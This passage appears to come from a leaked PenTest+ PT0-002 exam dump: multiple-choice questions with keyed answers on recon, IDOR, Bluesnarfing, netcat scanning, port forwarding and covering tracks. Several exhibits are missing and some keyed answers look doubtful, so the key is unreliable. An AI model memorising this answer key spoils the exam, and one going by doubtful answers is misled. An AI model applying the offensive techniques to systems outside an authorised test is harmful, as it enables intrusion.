information about systems connected to the Internet, such as servers and Internet of things (IoT) devices. QUESTION 163 A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log: Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets? A. Run an application vulnerability scan and then identify the TCP ports used by the application. B. Run the application attached to a debugger and then review the application's log. C. Disassemble the binary code and then identify the break points. D. Start a packet capture with Wireshark and then run the application. Answer: D QUESTION 164 When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because: A. security compliance regulations or laws may be violated. B. testing can make detecting actual APT more challenging. C. testing adds to the workload of defensive cyber- and threat-hunting teams. D. business and network operations may be impacted. Answer: D QUESTION 165 A company uses a cloud provider with shared network bandwidth to host a web application on dedicated servers. The company's contact with the cloud provider prevents any activities that Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 74 https://www.lead2pass.com would interfere with the cloud provider's other customers. When engaging with a penetration- testing company to test the application, which of the following should the company avoid? A. Crawling the web application's URLs looking for vulnerabilities B. Fingerprinting all the IP addresses of the application's servers C. Brute forcing the application's passwords D. Sending many web requests per second to test DDoS protection Answer: D QUESTION 166 A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.) A. Spawned shells B. Created user accounts C. Server logs D. Administrator accounts E. Reboot system F. ARP cache Answer: AB Explanation: Removing shells: Remove any shell programs installed when performing the pentest. Removing tester-created credentials: Be sure to remove any user accounts created during the pentest. This includes backdoor accounts. Removing tools: Remove any software tools that were installed on the customer’s systems that were used to aid in the exploitation of systems. QUESTION 167 A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify? A. Weak authentication schemes B. Credentials stored in strings C. Buffer overflows D. Non-optimized resource management Answer: C Explanation: Fuzzing introduces unexpected inputs into a system and watches to see if the system has any negative reactions to the inputs that indicate security, performance, or quality gaps or issues. QUESTION 168 A penetration tester has prepared the following phishing email for an upcoming penetration test: Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 75 https://www.lead2pass.com Which of the following is the penetration tester using MOST to influence phishing targets to click on the link? A. Familiarity and likeness B. Authority and urgency C. Scarcity and fear D. Social proof and greed Answer: B QUESTION 169 During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application. Which of the following vulnerabilities has the penetration tester exploited? A. Command injection B. Broken authentication C. Direct object reference D. Cross-site scripting Answer: C Explanation: Insecure direct object reference (IDOR) is a vulnerability where the developer of the application does not implement authorization features to verify that someone accessing data on the site is allowed to access that data. QUESTION 170 Which of the following situations would MOST likely warrant revalidation of a previous security assessment? A. After detection of a breach B. After a merger or an acquisition C. When an organization updates its network firewall configurations D. When most of the vulnerabilities have been remediated Answer: D Explanation: After the customer follows those recommended remediation steps, the customer may want to have those systems retested in order to validate that the remediation steps worked. Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 76 https://www.lead2pass.com QUESTION 171 A penetration tester gains access to a system and is able to migrate to a user process: Given the output above, which of the following actions is the penetration tester performing? (Choose two.) A. Redirecting output from a file to a remote system B. Building a scheduled task for execution C. Mapping a share to a remote system D. Executing a file on the remote system E. Creating a new process on all domain systems F. Setting up a reverse shell from a remote system G. Adding an additional IP address on the compromised system Answer: CD Explanation: The "net use" command is a Command Prompt command used to connect to, remove, and configure connections to shared resources, like mapped drives and network printers. WMIC.exe is a built-in Microsoft program that allows command-line access to the Windows Management Instrumentation. Using this tool, administrators can query the operating system for detailed information about installed hardware and Windows settings, run management tasks, and even execute other programs or commands. QUESTION 172 After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results: The tester then runs the following command from the previous exploited system, which fails: Which of the following explains the reason why the command failed? A. The tester input the incorrect IP address. Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 77 https://www.lead2pass.com B. The command requires the ג€"port 135 option. C. An account for RDP does not exist on the server. D. PowerShell requires administrative privilege. Answer: A Explanation: Enter-Pssession uses 5985 as the default port. QUESTION 173 Which of the following assessment methods is MOST likely to cause harm to an ICS environment? A. Active scanning B. Ping sweep C. Protocol reversing D. Packet analysis Answer: A Explanation: Industrial control systems (ICSs), SCADA, and Industrial Internet of Things devices are used to manage factories, utilities, and a wide range of other industrial devices. They require special care when testing due to the potential for harm to business processes and other infrastructure if they are disrupted. QUESTION 174 During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a network administrator that is broadcasting Bluetooth frames. Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform? A. Sniff and then crack the WPS PIN on an associated WiFi device. B. Dump the user address book on the device. C. Break a connection between two Bluetooth devices. D. Transmit text messages to the device. Answer: B Explanation: Bluesnarfing: A Bluetooth attack that allows the hacker to exploit the Bluetooth device and copy data off the device. For example, the hacker could copy the contacts off of a victim’s smartphone. QUESTION 175 Which of the following would a company's hunt team be MOST interested in seeing in a final report? A. Executive summary B. Attack TTPs C. Methodology D. Scope details Answer: B Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 78 https://www.lead2pass.com QUESTION 176 A Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades- old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any potential vulnerability. Which of the following should the penetration tester consider BEFORE running a scan? A. The timing of the scan B. The bandwidth limitations C. The inventory of assets and versions D. The type of scan Answer: D Explanation: Testing a firewall to see what ports are open not penetrating the firewall. Use ack or fin scan. QUESTION 177 Which of the following provides an exploitation suite with payload modules that cover the broadest range of target system types? A. Nessus B. Metasploit C. Burp Suite D. Ethercap Answer: B QUESTION 178 A penetration tester writes the following script: Which of the following is the tester performing? A. Searching for service vulnerabilities B. Trying to recover a lost bind shell C. Building a reverse shell listening on specified ports D. Scanning a network for specific open ports Answer: D Explanation: -z zero-I/O mode [used for scanning] Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 79 https://www.lead2pass.com -v verbose example output of script: 10.0.0.1: inverse host lookup failed: Unknown host (UNKNOWN) [10.0.0.1] 22 (ssh) open (UNKNOWN) [10.0.0.1] 23 (telnet) : Connection timed out https://unix.stackexchange.com/questions/589561/what-is-nc-z-used-for QUESTION 179 A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal Sendmail server. To remain stealthy, the tester ran the following command from the attack machine: Which of the following would be the BEST command to use for further progress into the targeted network? A. nc 10.10.1.2 B. ssh 10.10.1.2 C. nc 127.0.0.1 5555 D. ssh 127.0.0.1 5555 Answer: C Explanation: Port 25 from the remote host is forwarded to local port 5555 (to IP: 10.10.1.2). So if you have forwarded the port to yourself, it means you can access it by connecting to 127.0.0.1 or 10.10.1.2. Next par